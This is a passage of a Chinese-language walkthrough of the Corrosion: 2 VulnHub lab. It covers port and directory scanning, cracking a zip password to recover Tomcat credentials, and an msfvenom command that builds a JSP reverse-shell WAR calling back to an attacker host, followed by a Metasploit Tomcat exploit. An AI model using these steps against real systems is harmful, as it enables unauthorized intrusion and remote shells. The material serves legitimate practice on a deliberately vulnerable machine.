準備:
攻擊機:虛擬機kali、本機win10 。
靶機:CORROSION: 2,網段地址我這里設置的橋接,所以與本機電腦在同一網段,下載地址:https://download.vulnhub.com/corrosion/Corrosion2.ova.torrent,下載后直接vbox打開即可 。
知識點:CVE-2021-4034漏洞利用、fcrackzip爆破zip文件密碼、tomcat獲取shell(知賬戶和密碼)、unshadow生成密碼本、john爆破密碼 。

文章插圖
信息收集:
通過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 192.168.100.0/24,獲得靶機地址:192.168.100.244 。

文章插圖
掃描下開放的端口和對應的服務:nmap -T4 -sV -p- -A 192.168.100.244,顯示開放了22、80、8080端口,開啟了ssh服務、apache服務 。

文章插圖
使用dirmap進行目錄掃描,80端口未發現有用信息,但是在8080端口發現readme.txt、backup.zip等文件,掃描命令:python dirmap.py -i http://192.168.100.244:8080/ -lcf 。

文章插圖
訪問下80端口,在80端口的源代碼頁面中發現讓我們查看https://launchpad.net/bugs/1288690網頁 。

文章插圖

文章插圖
訪問下8080端口和端口的readme.txt文件,下載backup.zip文件進行解壓查看,但是需要密碼 。

文章插圖

文章插圖
信息利用:
使用zip密碼爆破工具(fcrackzip)進行密碼爆破,命令:fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip,獲得密碼:@administrator_hi5 。

文章插圖
在解壓的tomcat-users.xml文件中發現兩組賬戶和密碼:manager/melehifokivai、admin/melehifokivai 。

文章插圖
使用賬戶名和密碼在8080端口登錄 。

文章插圖
想著部署項目實現shell反彈,但是失敗了,war包生成命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.166 LPORT=6688 -f war -o upfine.war,在本地上傳部署后,訪問下該服務 。

文章插圖
shell獲取:
在msf中存在一個配合賬號和密碼獲取tomcat shell權限的exp 。

文章插圖
選擇該exp:use 6,設置下賬號、密碼、ip信息、端口信息,然后run即可 。

文章插圖

文章插圖
使用當前用戶在系統里查看下目錄信息和文件信息,在/home下發現兩個用戶文件夾,但是/jaye的文件夾無權限查看,在randy文件下下發現了note.txt和user.txt進行查看,獲得第一個flag 。

文章插圖
越權訪問:
在虛擬機的初始界面存在三個賬戶:jaye、randy、tomcat,發現jaye賬戶使用密碼:melehifokivai可以成功登錄或者使用xshell登錄 。
經驗總結擴展閱讀
- 星火之歌克利奧帕特拉定位為控制
- 花亦山心之月天賜錦鯉活動攻略
- 身弱之女一般嫁什么人 身弱的人找什么配偶
- 五行齊全有可怕之處嗎 五行缺哪一項最不好
- 贊美荷花的唯美短句 描寫荷花動態之美的句子
- 寒露過后是什么節氣 寒露之后是哪個節氣
- 生成器函數 javascript異步編程之generator與asnyc/await語法糖
- 30天之后喜事傳千里 財運愛情喜上加喜的3大星座
- 未來30天意外之財接連不斷 桃花如虹好運不斷的3大星座
- 金鏟鏟之戰巨龍之巢龍拳瑟提玩法是什么
